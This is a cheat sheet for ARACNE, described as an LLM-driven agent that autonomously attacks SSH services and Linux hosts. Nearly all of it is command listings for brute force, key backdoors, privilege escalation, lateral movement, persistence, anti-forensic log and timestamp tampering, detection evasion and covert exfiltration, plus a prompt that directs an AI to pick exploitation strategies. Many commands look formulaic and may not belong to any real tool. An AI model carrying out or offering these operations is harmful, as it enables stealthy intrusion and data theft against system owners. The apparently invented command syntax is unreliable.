ARACNE Cheat Sheet
Overview
ARACNE (Autonomous Reconnaissance and Attack Coordination for Network Exploitation) is an LLM-based agent designed specifically for targeting SSH services and for autonomously exploring and exploiting Linux shell environments. It combines large language models with traditional penetration testing to carry out sophisticated attacks on SSH-enabled systems.
Critical warning: Advanced autonomous exploitation tool. Use it only on systems you own or have explicit written authorization to test. Unauthorized use is illegal.
Installation
Prerequisites
```bash
# System requirements
python3 --version  # Python 3.9+
pip3 --version
git --version

# Required system packages
sudo apt update
sudo apt install -y python3-pip python3-venv git curl wget
sudo apt install -y openssh-client sshpass hydra nmap masscan

# Install additional security tools
sudo apt install -y john hashcat gobuster dirb nikto
sudo apt install -y metasploit-framework exploitdb
```
Installation Methods
```bash
# Method 1: Git clone and setup
git clone https://github.com/aracne-ai/aracne.git
cd aracne
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

# Install LLM dependencies
pip install openai anthropic langchain
pip install transformers torch
pip install paramiko fabric pexpect

# Method 2: Docker installation
docker pull aracne/aracne:latest
docker run -it --rm -v "$(pwd)/sessions:/app/sessions" aracne/aracne:latest

# Method 3: PyPI installation (if available)
pip install aracne-agent
```
Configuration Setup
```bash
# Create configuration directory
mkdir -p ~/.aracne/config
mkdir -p ~/.aracne/sessions
mkdir -p ~/.aracne/payloads
mkdir -p ~/.aracne/logs

# Initialize configuration
aracne init

# Configure LLM providers
aracne config set openai_api_key "your-openai-key"
aracne config set openai_model "gpt-4"
aracne config set anthropic_api_key "your-anthropic-key"

# Set operational parameters
aracne config set max_session_time 3600
aracne config set autonomous_mode true
aracne config set stealth_mode true
aracne config set evidence_collection true
```
Core Commands
Basic Operations
```bash
# Display help and version
aracne --help
aracne --version
aracne modules list

# Quick SSH reconnaissance
aracne recon ssh --target 192.168.1.100
aracne recon ssh --network 192.168.1.0/24
aracne recon ssh --target-list targets.txt

# SSH service analysis
aracne analyze ssh --target 192.168.1.100 --deep
aracne analyze ssh --target 192.168.1.100 --version-detection
aracne analyze ssh --target 192.168.1.100 --configuration-analysis

# System status and health
aracne status
aracne health-check
aracne modules status
```
Target Management
```bash
# Add SSH targets
aracne target add --host 192.168.1.100 --port 22
aracne target add --host example.com --port 2222
aracne target add --network 192.168.1.0/24 --ssh-only

# Target information and management
aracne target list --active
aracne target info 192.168.1.100
aracne target remove 192.168.1.100

# Import targets from various sources
aracne target import --nmap ssh_scan.xml
aracne target import --masscan masscan_results.txt
aracne target import --file ssh_targets.txt

# Target prioritization
aracne target prioritize --by vulnerability
aracne target prioritize --by accessibility
aracne target prioritize --custom-scoring
```
Session Management
```bash
# Create and manage attack sessions
aracne session create --target 192.168.1.100 --name "target_compromise"
aracne session list --active
aracne session switch target_compromise

# Session configuration
aracne session config --max-duration 2h
aracne session config --stealth-level high
aracne session config --logging-level verbose

# Session control
aracne session start --target 192.168.1.100
aracne session pause target_compromise
aracne session resume target_compromise
aracne session terminate target_compromise
```
SSH Reconnaissance and Analysis
SSH Service Discovery
```bash
# Comprehensive SSH discovery
aracne discover ssh --network 192.168.1.0/24 --comprehensive
aracne discover ssh --target-list targets.txt --fast
aracne discover ssh --target 192.168.1.100 --deep-analysis

# SSH version and banner analysis
aracne analyze banner --target 192.168.1.100
aracne analyze version --target 192.168.1.100 --vulnerability-check
aracne analyze configuration --target 192.168.1.100 --security-assessment

# SSH algorithm and cipher analysis
aracne analyze algorithms --target 192.168.1.100
aracne analyze ciphers --target 192.168.1.100 --weak-crypto
aracne analyze kex --target 192.168.1.100 --security-analysis
```
SSH Vulnerability Assessment
```bash
# SSH-specific vulnerability scanning
aracne vuln scan-ssh --target 192.168.1.100 --comprehensive
aracne vuln scan-ssh --target 192.168.1.100 --known-exploits
aracne vuln scan-ssh --network 192.168.1.0/24 --quick

# Configuration vulnerability analysis
aracne vuln config --target 192.168.1.100 --misconfigurations
aracne vuln config --target 192.168.1.100 --weak-settings
aracne vuln config --target 192.168.1.100 --default-configs

# SSH implementation vulnerabilities
aracne vuln implementation --target 192.168.1.100 --version-specific
aracne vuln implementation --target 192.168.1.100 --buffer-overflows
aracne vuln implementation --target 192.168.1.100 --timing-attacks
```
User Enumeration
```bash
# SSH user enumeration techniques
aracne enum users --target 192.168.1.100 --timing-based
aracne enum users --target 192.168.1.100 --error-based
aracne enum users --target 192.168.1.100 --comprehensive

# Username wordlist generation
aracne generate usernames --target 192.168.1.100 --context-aware
aracne generate usernames --company "Example Corp" --employees
aracne generate usernames --domain example.com --email-based

# User validation and verification
aracne validate users --target 192.168.1.100 --user-list users.txt
aracne validate users --target 192.168.1.100 --probabilistic
aracne validate users --target 192.168.1.100 --stealth-mode
```
Autonomous SSH Exploitation
Credential-Based Attacks
```bash
# Intelligent brute force attacks
aracne attack brute-force --target 192.168.1.100 --smart
aracne attack brute-force --target 192.168.1.100 --user admin --adaptive
aracne attack brute-force --target 192.168.1.100 --credential-stuffing

# Dictionary attacks with AI optimization
aracne attack dictionary --target 192.168.1.100 --ai-optimized
aracne attack dictionary --target 192.168.1.100 --context-aware
aracne attack dictionary --target 192.168.1.100 --pattern-learning

# Credential spraying
aracne attack spray --network 192.168.1.0/24 --common-passwords
aracne attack spray --target-list targets.txt --seasonal-passwords
aracne attack spray --targets multiple --lockout-aware
```
Key-Based Attacks
```bash
# SSH key discovery and analysis
aracne keys discover --target 192.168.1.100 --web-crawling
aracne keys discover --target 192.168.1.100 --git-repositories
aracne keys discover --target 192.168.1.100 --configuration-files

# Private key attacks
aracne keys attack --target 192.168.1.100 --weak-keys
aracne keys attack --target 192.168.1.100 --default-keys
aracne keys attack --target 192.168.1.100 --cracking

# Key injection and manipulation
aracne keys inject --target 192.168.1.100 --authorized-keys
aracne keys manipulate --target 192.168.1.100 --key-replacement
aracne keys backdoor --target 192.168.1.100 --persistent-access
```
Protocol-Level Exploits
```bash
# SSH protocol exploitation
aracne exploit protocol --target 192.168.1.100 --version-specific
aracne exploit protocol --target 192.168.1.100 --implementation-bugs
aracne exploit protocol --target 192.168.1.100 --timing-attacks

# Man-in-the-middle attacks
aracne exploit mitm --target 192.168.1.100 --arp-poisoning
aracne exploit mitm --target 192.168.1.100 --dns-spoofing
aracne exploit mitm --target 192.168.1.100 --certificate-manipulation

# Downgrade attacks
aracne exploit downgrade --target 192.168.1.100 --weak-algorithms
aracne exploit downgrade --target 192.168.1.100 --legacy-protocols
aracne exploit downgrade --target 192.168.1.100 --cipher-downgrade
```
Linux Shell Exploitation
Initial Access and Shell Operation
```bash
# Establish initial shell access
aracne shell establish --target 192.168.1.100 --method ssh
aracne shell establish --target 192.168.1.100 --credentials user:pass
aracne shell establish --target 192.168.1.100 --key-file private_key

# Shell upgrade and stabilization
aracne shell upgrade --session session-123 --interactive
aracne shell upgrade --session session-123 --pty
aracne shell upgrade --session session-123 --full-terminal

# Shell persistence mechanisms
aracne shell persist --session session-123 --cron-job
aracne shell persist --session session-123 --systemd-service
aracne shell persist --session session-123 --ssh-keys
```
System Reconnaissance
```bash
# Autonomous system enumeration
aracne recon system --session session-123 --comprehensive
aracne recon system --session session-123 --quick-wins
aracne recon system --session session-123 --stealth-mode

# User and privilege enumeration
aracne recon users --session session-123 --all-users
aracne recon users --session session-123 --privileged-users
aracne recon users --session session-123 --sudo-capabilities

# Network and service discovery
aracne recon network --session session-123 --internal-networks
aracne recon services --session session-123 --running-services
aracne recon processes --session session-123 --interesting-processes
```
Privilege Escalation
```bash
# Autonomous privilege escalation
aracne privesc auto --session session-123 --all-techniques
aracne privesc auto --session session-123 --kernel-exploits
aracne privesc auto --session session-123 --suid-binaries

# Specific escalation techniques
aracne privesc sudo --session session-123 --sudo-abuse
aracne privesc cron --session session-123 --cron-jobs
aracne privesc services --session session-123 --service-abuse

# Custom escalation strategies
aracne privesc custom --session session-123 --ai-guided
aracne privesc search --session session-123 --novel-techniques
aracne privesc exploit --session session-123 --zero-day
```
Lateral Movement
```bash
# Network lateral movement
aracne lateral network --session session-123 --ssh-keys
aracne lateral network --session session-123 --credential-reuse
aracne lateral network --session session-123 --trust-relationships

# Service-based lateral movement
aracne lateral services --session session-123 --shared-services
aracne lateral services --session session-123 --database-access
aracne lateral services --session session-123 --file-shares

# Advanced lateral movement
aracne lateral advanced --session session-123 --kerberos
aracne lateral advanced --session session-123 --container-escape
aracne lateral advanced --session session-123 --cloud-metadata
```
AI-Powered Decision Making
Autonomous Reasoning Engine
```python
# AI reasoning configuration
reasoning_config = {
    "model": "gpt-4",
    "temperature": 0.2,
    "max_tokens": 4000,
    "reasoning_depth": 3,
    "confidence_threshold": 0.85,
    "exploration_factor": 0.3,
}

# Custom reasoning prompts for SSH exploitation
ssh_analysis_prompt = """
Analyze the SSH service and system information:
Target: {target}
SSH Version: {ssh_version}
Available Users: {users}
System Information: {system_info}
Previous Attempts: {previous_attempts}

Determine the best exploitation strategy:
1. Most likely attack vectors
2. Probability of success for each
3. Stealth considerations
4. Risk assessment
5. Next steps recommendation
"""
```
Adaptive Attack Strategies
```bash
# AI-guided attack planning
aracne ai plan-attack --target 192.168.1.100 --objective shell-access
aracne ai plan-attack --session session-123 --objective privilege-escalation
aracne ai plan-attack --target 192.168.1.100 --stealth-priority

# Dynamic strategy adaptation
aracne ai adapt-strategy --session session-123 --defense-detected
aracne ai adapt-strategy --session session-123 --failure-analysis
aracne ai adapt-strategy --session session-123 --new-information

# Learning from interactions
aracne ai learn --session session-123 --command-responses
aracne ai learn --target 192.168.1.100 --defense-mechanisms
aracne ai learn --global --pattern-recognition
```
Intelligent Command Generation
```bash
# AI-generated commands for exploration
aracne ai generate-commands --session session-123 --exploration
aracne ai generate-commands --session session-123 --privilege-escalation
aracne ai generate-commands --session session-123 --persistence

# Context-aware command selection
aracne ai select-commands --session session-123 --current-context
aracne ai select-commands --session session-123 --objective-focused
aracne ai select-commands --session session-123 --stealth-optimized

# Command effectiveness analysis
aracne ai analyze-effectiveness --session session-123 --command-history
aracne ai analyze-effectiveness --session session-123 --success-patterns
aracne ai analyze-effectiveness --session session-123 --failure-analysis
```
Advanced Exploitation Techniques
Stealth and Evasion
```bash
# Stealth mode operations
aracne stealth enable --session session-123 --advanced-evasion
aracne stealth timing --session session-123 --random-delays
aracne stealth obfuscation --session session-123 --command-obfuscation

# Anti-forensics techniques
aracne antiforensics enable --session session-123 --log-cleaning
aracne antiforensics timestamps --session session-123 --timestamp-manipulation
aracne antiforensics artifacts --session session-123 --artifact-removal

# Detection evasion
aracne evasion ids --session session-123 --ids-evasion
aracne evasion monitoring --session session-123 --monitoring-detection
aracne evasion behavioral --session session-123 --behavioral-mimicry
```
Persistence Mechanisms
```bash
# Establish persistent access
aracne persist establish --session session-123 --multiple-methods
aracne persist establish --session session-123 --stealth-persistence
aracne persist establish --session session-123 --redundant-access

# Persistence validation and testing
aracne persist validate --session session-123 --all-methods
aracne persist test --session session-123 --reconnection-test
aracne persist monitor --session session-123 --persistence-health

# Persistence cleanup and removal
aracne persist cleanup --session session-123 --selective-removal
aracne persist remove --session session-123 --complete-cleanup
aracne persist verify-removal --session session-123 --forensic-check
```
Data Exfiltration and Collection
```bash
# Intelligent data discovery
aracne data discover --session session-123 --sensitive-files
aracne data discover --session session-123 --database-content
aracne data discover --session session-123 --configuration-files

# Data classification and prioritization
aracne data classify --session session-123 --ai-classification
aracne data prioritize --session session-123 --business-value
aracne data assess --session session-123 --sensitivity-analysis

# Secure data exfiltration
aracne data exfiltrate --session session-123 --encrypted-channel
aracne data exfiltrate --session session-123 --steganography
aracne data exfiltrate --session session-123 --covert-channels
```
Monitoring and Logging
Session Monitoring
```bash
# Real-time session monitoring
aracne monitor session --session session-123 --real-time
aracne monitor activity --session session-123 --command-tracking
aracne monitor progress --session session-123 --objective-tracking

# Performance and resource monitoring
aracne monitor performance --session session-123 --resource-usage
aracne monitor network --session session-123 --traffic-analysis
aracne monitor system --session session-123 --system-impact

# Alert and notification system
aracne monitor alerts --session session-123 --critical-events
aracne monitor notifications --session session-123 --progress-updates
aracne monitor warnings --session session-123 --risk-indicators
```
Comprehensive Logging
```bash
# Enable detailed logging
aracne logging enable --session session-123 --comprehensive
aracne logging enable --session session-123 --ai-decisions
aracne logging enable --session session-123 --command-responses

# Log analysis and insights
aracne logging analyze --session session-123 --pattern-analysis
aracne logging analyze --session session-123 --success-factors
aracne logging analyze --session session-123 --failure-analysis

# Log export and reporting
aracne logging export --session session-123 --format json
aracne logging export --session session-123 --timeline-format
aracne logging export --session session-123 --forensic-format
```
Security and Ethical Considerations
Authorization and Legal Compliance
```bash
# Define authorized targets and scope
aracne scope define --target 192.168.1.100 --authorized
aracne scope define --network 192.168.1.0/24 --internal-testing
aracne scope validate --target 192.168.1.100 --legal-check

# Documentation and evidence
aracne legal document --session session-123 --authorization-proof
aracne legal evidence --session session-123 --chain-of-custody
aracne legal export --session session-123 --court-ready

# Compliance verification
aracne compliance check --session session-123 --ethical-guidelines
aracne compliance verify --session session-123 --legal-requirements
aracne compliance audit --session session-123 --comprehensive
```
Safety and Risk Management
```bash
# Risk assessment and management
aracne risk assess --session session-123 --comprehensive
aracne risk monitor --session session-123 --real-time
aracne risk mitigate --session session-123 --automatic

# Safety controls and limits
aracne safety enable --session session-123 --all-controls
aracne safety limits --session session-123 --time-limits
aracne safety boundaries --session session-123 --scope-enforcement

# Emergency procedures
aracne emergency stop --session session-123 --immediate
aracne emergency cleanup --session session-123 --evidence-removal
aracne emergency report --session session-123 --incident-documentation
```
Troubleshooting and Optimization
Performance Optimization
```bash
# Optimize AI model performance
aracne optimize ai --model-selection --performance-focused
aracne optimize ai --token-usage --cost-optimization
aracne optimize ai --response-time --latency-reduction

# Session performance optimization
aracne optimize session --session session-123 --speed-optimization
aracne optimize session --session session-123 --resource-optimization
aracne optimize session --session session-123 --stealth-optimization

# Network and connectivity optimization
aracne optimize network --session session-123 --connection-stability
aracne optimize network --session session-123 --bandwidth-optimization
aracne optimize network --session session-123 --latency-reduction
```
Debugging and Diagnostics
```bash
# Debug mode and verbose logging
aracne --debug session start --target 192.168.1.100
aracne --verbose ai plan-attack --target 192.168.1.100
aracne logs view --level debug --component ai-reasoning

# System diagnostics
aracne diagnose system --comprehensive
aracne diagnose ai-models --connectivity-test
aracne diagnose ssh-client --configuration-check

# Error analysis and resolution
aracne errors analyze --session session-123 --root-cause
aracne errors resolve --error-id 12345 --auto-fix
aracne errors prevent --session session-123 --predictive-analysis
```
Recovery and Backup
```bash
# Session recovery and restoration
aracne recover session --session-id session-123 --full-recovery
aracne recover state --session session-123 --checkpoint-restore
aracne recover connection --session session-123 --reconnect

# Backup and data protection
aracne backup create --session session-123 --incremental
aracne backup restore --backup-id backup-456 --selective
aracne backup verify --backup-id backup-456 --integrity-check

# Data integrity and validation
aracne verify integrity --session session-123 --all-data
aracne verify consistency --session session-123 --cross-validation
aracne verify authenticity --session session-123 --digital-signatures
```
Integration Examples
SIEM Integration
```python
# integrations/siem_integration.py
import json

import requests
from aracne.core.integration import BaseIntegration


class SIEMIntegration(BaseIntegration):
    def __init__(self, siem_url, api_key):
        self.siem_url = siem_url
        self.api_key = api_key

    def send_ssh_attempt(self, attempt_data):
        # Report one SSH authentication attempt to the SIEM
        event = {
            "timestamp": attempt_data.timestamp,
            "source": "aracne",
            "event_type": "ssh_attempt",
            "target": attempt_data.target,
            "username": attempt_data.username,
            "success": attempt_data.success,
            "method": attempt_data.method,
        }
        return self.send_event(event)

    def send_privilege_escalation(self, privesc_data):
        # Report one privilege escalation attempt to the SIEM
        event = {
            "timestamp": privesc_data.timestamp,
            "source": "aracne",
            "event_type": "privilege_escalation",
            "target": privesc_data.target,
            "technique": privesc_data.technique,
            "success": privesc_data.success,
            "privileges_gained": privesc_data.privileges,
        }
        return self.send_event(event)

    def send_event(self, event):
        # POST the event as JSON; returns True only on HTTP 200
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json",
        }
        response = requests.post(
            f"{self.siem_url}/api/events",
            headers=headers,
            json=event,
            timeout=10,  # avoid hanging the session if the SIEM is unreachable
        )
        return response.status_code == 200
```
Threat Intelligence Integration
```python
# integrations/threat_intel.py
import requests
from aracne.core.threat_intel import ThreatIntelProvider


class ThreatIntelIntegration(ThreatIntelProvider):
    def __init__(self, api_key):
        self.api_key = api_key
        self.base_url = "https://api.threatintel.com"

    def get_ssh_vulnerabilities(self, ssh_version):
        # Look up known vulnerabilities for an SSH version; empty list on error
        headers = {"Authorization": f"Bearer {self.api_key}"}
        response = requests.get(
            f"{self.base_url}/vulnerabilities/ssh/{ssh_version}",
            headers=headers,
            timeout=10,
        )
        if response.status_code == 200:
            return response.json()
        return []

    def get_exploit_techniques(self, target_os, target_version):
        # Look up techniques recorded for an OS and version; empty list on error
        headers = {"Authorization": f"Bearer {self.api_key}"}
        response = requests.get(
            f"{self.base_url}/techniques/{target_os}/{target_version}",
            headers=headers,
            timeout=10,
        )
        if response.status_code == 200:
            return response.json()
        return []

    def report_new_technique(self, technique_data):
        # Submit a technique report; returns True only on HTTP 201
        headers = {
            "Authorization": f"Bearer {self.api_key}",
            "Content-Type": "application/json",
        }
        response = requests.post(
            f"{self.base_url}/techniques/report",
            headers=headers,
            json=technique_data,
            timeout=10,
        )
        return response.status_code == 201
```
Best Practices
SSH Exploitation Best Practices
```bash
# Reconnaissance before exploitation
aracne recon comprehensive --target 192.168.1.100 --pre-exploitation
aracne analyze target --target 192.168.1.100 --vulnerability-assessment
aracne plan attack --target 192.168.1.100 --risk-assessment

# Gradual escalation approach
aracne attack gentle --target 192.168.1.100 --low-impact
aracne attack moderate --target 192.168.1.100 --measured-approach
aracne attack aggressive --target 192.168.1.100 --high-confidence

# Stealth and operational security
aracne stealth maximum --session session-123 --anti-detection
aracne opsec enable --session session-123 --comprehensive
aracne evasion advanced --session session-123 --adaptive
```
AI Model Optimization
```bash
# Model selection and tuning
aracne ai optimize --model-selection --task-specific
aracne ai tune --parameters --performance-focused
aracne ai calibrate --confidence-thresholds --accuracy-focused

# Prompt engineering and optimization
aracne ai optimize-prompts --task ssh-exploitation
aracne ai optimize-prompts --task privilege-escalation
aracne ai optimize-prompts --task lateral-movement

# Continuous learning and improvement
aracne ai learn --from-sessions --pattern-recognition
aracne ai update --knowledge-base --latest-techniques
aracne ai validate --accuracy --benchmark-testing
```
Operational Excellence
```bash
# Session management best practices
aracne session plan --target 192.168.1.100 --comprehensive-planning
aracne session execute --plan session-plan --monitored-execution
aracne session review --session session-123 --lessons-learned

# Documentation and reporting
aracne document session --session session-123 --comprehensive
aracne report generate --session session-123 --technical-details
aracne evidence collect --session session-123 --forensic-quality

# Quality assurance and validation
aracne validate findings --session session-123 --cross-verification
aracne verify exploits --session session-123 --proof-of-concept
aracne assess impact --session session-123 --business-context
```
Resources
Documentation
- ARACNE Documentation
- SSH Exploitation Guide
- AI Integration Manual
Research and Papers
- ARACNE Research Papers
- LLM-Based Exploitation
- Autonomous Hacking Systems
Community
- ARACNE GitHub
- Security Research Forum
- AI Security Discord